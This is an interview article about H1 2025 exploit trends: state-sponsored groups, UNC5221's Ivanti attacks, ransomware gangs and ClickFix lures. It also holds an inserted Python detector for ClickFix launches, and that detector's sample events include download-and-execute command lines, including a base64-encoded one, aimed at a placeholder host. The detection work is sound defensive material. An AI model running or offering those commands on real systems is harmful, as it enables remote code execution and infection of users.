State-Sponsored Hackers Lead Cyber Exploits in H1 2025

Diving into the complex world of cybersecurity, we’re thrilled to speak with Malik Haidar, a seasoned expert who has spent years safeguarding multinational corporations from digital threats. With a sharp focus on analytics, intelligence, and integrating business strategies into security frameworks, Malik offers a unique perspective on the evolving landscape of cyber risks. In this interview, we explore critical insights from recent findings on state-sponsored hacking, the surge in vulnerability exploits, the tactics of financially motivated groups, and emerging social engineering trends. Join us as we uncover the strategies behind these threats and what they mean for the future of digital security.

Can you walk us through the key findings from recent research about the role of state-sponsored hackers in vulnerability exploits during the first half of 2025?

Absolutely, Olivia. A recent report highlighted that state-sponsored hackers were responsible for over half—specifically 53%—of all attributed vulnerability exploits in the first half of 2025. These actors are typically well-resourced and focus on strategic, geopolitical goals like espionage and surveillance. What’s striking is their ability to weaponize vulnerabilities almost immediately after they’re disclosed, turning flaws into tools for targeted, persistent campaigns against specific sectors or high-value systems.

What drives these state-sponsored attacks, and why are they so concerning?

The primary motives are rooted in geopolitics—think espionage, gaining strategic advantages, or monitoring critical infrastructure. These aren’t random hits; they’re calculated efforts to infiltrate systems that hold sensitive data or control key operations. The concern comes from their persistence and the resources behind them. Unlike opportunistic attacks, these campaigns are often backed by nation-states, meaning they have the funding and expertise to keep probing until they succeed, which poses a significant challenge for defenders.

The research pointed to a heavy involvement of Chinese state-sponsored groups in these exploits. Can you elaborate on this trend and what they’re targeting?

Yes, the data shows that a majority of state-sponsored campaigns traced back to Chinese actors. They’ve been particularly focused on edge infrastructure and enterprise solutions—systems that sit at the perimeter of networks or manage large-scale operations. This trend has been consistent since at least 2024. These targets are critical because they often act as gateways, providing access to broader networks or encrypted traffic, making them a goldmine for espionage or disruption.

Can you share an example of a specific group and the kind of technology they’ve been going after?

Certainly. One group that stands out is UNC5221, which is suspected to be China-linked. They’ve exploited more vulnerabilities than any other in the first half of 2025, with a particular focus on Ivanti products like Endpoint Manager Mobile, Connect Secure, and Policy Secure. These are tools used for remote access and endpoint management, so compromising them can give attackers a foothold into an organization’s entire network, often undetected for a long time.

Shifting gears, how significant is the role of financially motivated groups in these vulnerability exploits compared to state-sponsored actors?

They’re a major player, accounting for 47% of the exploits. Within that, 27% are tied to groups focused on theft and fraud—think stealing data or credentials for direct financial gain—while 20% are linked to ransomware and extortion gangs. These groups aren’t after geopolitical leverage; they’re in it for the money, and they’re just as relentless, exploiting the same kinds of flaws to lock down systems or siphon off valuable information.

Certain systems like edge security appliances and remote access tools seem to be prime targets. Why are these so attractive to both state-sponsored and financially motivated attackers?

These systems are the front door to an organization’s network. Edge security appliances and remote access tools handle encrypted traffic and privileged access, so compromising them offers a high reward—whether it’s for stealing data, planting surveillance tools, or deploying ransomware. They’re often exposed to the internet, making them easier to attack, and they’re used across industries, so the impact of a breach can be massive. Sectors like finance, healthcare, and critical infrastructure are especially at risk because they rely heavily on these technologies.

Microsoft emerged as the most targeted vendor in the findings. What makes their products such a frequent focus for exploits?

Microsoft’s products accounted for 17% of all exploitations, and that’s largely due to their ubiquity. Their software—think Windows, Office, and server solutions—is used by countless organizations worldwide, so attackers know there’s a huge pool of potential targets. Many of their tools are deeply integrated into business operations, which means a single flaw can ripple across an entire ecosystem. While specific products weren’t always detailed, historically, things like Exchange Server and Active Directory have been hotspots due to their critical role in email and user management.

A significant number of exploited vulnerabilities didn’t require authentication. Can you explain why that’s such a critical issue for cybersecurity?

It’s a huge problem because 69% of the 161 vulnerabilities exploited in this period needed no authentication—meaning attackers don’t need credentials or insider access to strike. On top of that, 48% could be exploited remotely over a network. This combination is deadly; it allows attackers to launch direct assaults from the internet against vulnerable systems with minimal barriers. The risk skyrockets because these flaws can be exploited at scale, often before organizations even realize they’re exposed.

The report also noted a rise in social engineering tactics like ClickFix among ransomware groups. Can you describe how these attacks work and why they’re so effective?

ClickFix is a devious tactic where attackers trick users into infecting themselves. Typically, a victim sees a fake error or verification message that prompts them to copy and paste a malicious script or file path and run it. It’s effective because it exploits human nature—people want to fix issues quickly without involving IT. By getting the user to execute the attack, it bypasses many security controls. Ransomware groups have leaned into this, and we’ve seen variations like FileFix evolve, where users are misled into accessing malicious paths via Windows File Explorer.
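As an added illustration (not part of the interview, and not Malik's or any vendor's tooling), here is a small detector that scans constructed process-creation records for the launch pattern ClickFix relies on: a script host started from explorer.exe (the Run box or, for FileFix, the File Explorer address bar) with a command line that hides its window, fetches something remote, or hides its real command behind an encoded argument. The launcher and script-host names, the indicator patterns and the sample events are assumptions built for this example.

```python
import base64
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the created process
    cmdline: str  # command line as logged
# Both the Win+R Run box and the File Explorer address bar (the FileFix variant) spawn from explorer.exe.
USER_LAUNCHERS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Traits of a pasted "fix" command: hide the window, fetch something remote, run it in memory.
INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+hid", re.I), "hidden window"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|bitsadmin)\b", re.I), "remote download"),
    (re.compile(r"mshta(\.exe)?\s+https?://", re.I), "remote HTA"),
]
ENCODED = re.compile(r"-e(ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(ev):
    """Return why an event looks like a user-pasted ClickFix command (empty list = not flagged)."""
    if ev.parent.lower() not in USER_LAUNCHERS or ev.image.lower() not in SCRIPT_HOSTS:
        return []
    decoded = decode_encoded_command(ev.cmdline)
    reasons = ["encoded command"] if decoded else []
    text = ev.cmdline + (" " + decoded if decoded else "")  # scan the decoded payload as well
    return reasons + [label for rx, label in INDICATORS if rx.search(text)]

def find_clickfix_candidates(events):
    return [(ev.image, r) for ev in events if (r := classify(ev))]
# Constructed sample telemetry, not real logs; example.invalid is a reserved test domain.
ENCODED_SAMPLE = base64.b64encode("IEX (IRM http://example.invalid/fix)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", 'powershell -w hidden -c "iex (irm http://example.invalid/fix)"'),
    ProcEvent("explorer.exe", "mshta.exe", "mshta https://example.invalid/verify.hta"),
    ProcEvent("explorer.exe", "powershell.exe", r"powershell -NoProfile -File C:\Users\me\backup.ps1"),
    ProcEvent("explorer.exe", "cmd.exe", f'cmd /c "powershell -NoP -enc {ENCODED_SAMPLE}"'),
]
```

The third sample (a normal script run from Explorer) is deliberately not flagged: the parent/child pairing alone is too noisy, so the command-line traits decide.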

Looking ahead, what is your forecast for the trajectory of social engineering tactics like ClickFix in the cybersecurity landscape?

I expect tactics like ClickFix to remain a favored method for initial access through 2025 and beyond, unless we see widespread user education or technical mitigations. Attackers are getting smarter, evolving these tricks to be more convincing and harder to detect. As long as humans are the weakest link—and we often are—social engineering will be a go-to for ransomware and other threat actors. The challenge is staying ahead with training and tools that can intercept these deceptions before they take root.
